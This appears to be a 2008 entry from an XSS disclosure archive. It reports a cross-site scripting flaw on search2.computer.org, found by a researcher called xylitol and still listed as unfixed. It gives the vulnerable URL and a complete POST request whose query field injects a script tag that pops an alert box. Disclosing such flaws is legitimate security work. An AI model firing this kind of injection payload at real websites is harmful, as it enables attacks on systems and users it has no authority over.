Security researcher xylitol, has submitted on 29/04/2008 a cross-site-scripting (XSS) vulnerability affecting search2.computer.org, which at the time of submission ranked 11240 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 20/06/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 29/04/2008 |
Date published: 20/06/2008 |
Fixed? Mail us! | Status: UNFIXED |
Author: xylitol |
Domain: search2.computer.org |
Category: XSS |
Pagerank: 11240 |
URL: http://search2.computer.org/advanced/simplesearch.jsp |
POST: 1=1&qtype=1&yearTo=2006&yearFrom=1870&monthTo=12&monthFrom=01&sortField=DocWeight&sortOrder=d&chkabs =yes&personal=3&isFirstTime=true&newSearchType=2&MyType=&query=%22%3E%3Cscript%3Ealert%280%29%3C%2Fs cript%3E&qOpt1=confulltext&check=dlearning%2Bannals%2Bcise%2Bcomputer%2Bcga%2Bconcurrency%2Bdt%2Bint elligent%2Binternet%2Bitpro%2Bmicro%2Bmultimedia%2Bsoftware%2Bpc%2BSecurity%2Btc%2Btkde%2Btpds%2Btpa mi%2Btse%2Btvcg%2Btmc%2Btcbb%2Btdsc%2Bdsonline%2Bproceedings%2Bacm&check=WebSite&res_sz=10 |
Click here to view the mirror
|
|
|